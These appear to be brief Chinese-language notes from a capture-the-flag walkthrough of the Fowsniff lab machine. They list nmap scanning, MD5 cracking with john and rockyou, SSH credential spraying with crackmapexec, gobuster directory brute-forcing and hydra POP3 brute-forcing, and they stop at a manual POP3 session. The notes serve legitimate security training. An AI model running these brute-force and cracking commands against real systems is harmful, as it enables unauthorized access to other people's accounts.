靶机精讲 之 Fownsniff
[22,80,110,140]
# C段
sudo nmap -sn 192.168.95.0/24
# 端口扫描
sudo nmap -min-rate 10000 -p- 192.168.95.135
# 详细信息扫描
sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.95.135
# 保存信息收集的内容
sudo vom leaked_data
cat leaked_data
# 哈希破解
hash-identifier xxxxxxxxxx
# john破解[MD5]
sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt leaked_data
# 破解
crackmapexec ssh 192.168.95.135 -u users -p passwords --continue-on-success
# 目录爆破
sudo gobuster dir -u http://192.168.95.135 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
# hydra查看pop3服务
hydra -L users -P passwords -f 192.168.95.135 pop3
# 与pop3交互
sudo nc 192.168.95.135 110
端口扫描
详细信息扫描
查看80端口的界面
信息收集
john破解[MD5]
处理操作
目录爆破
hydra 破解[查看pop3信息]
-
熟悉pop3服务器的语法【与pop3交互】
pop3 服务器是邮件存储的地方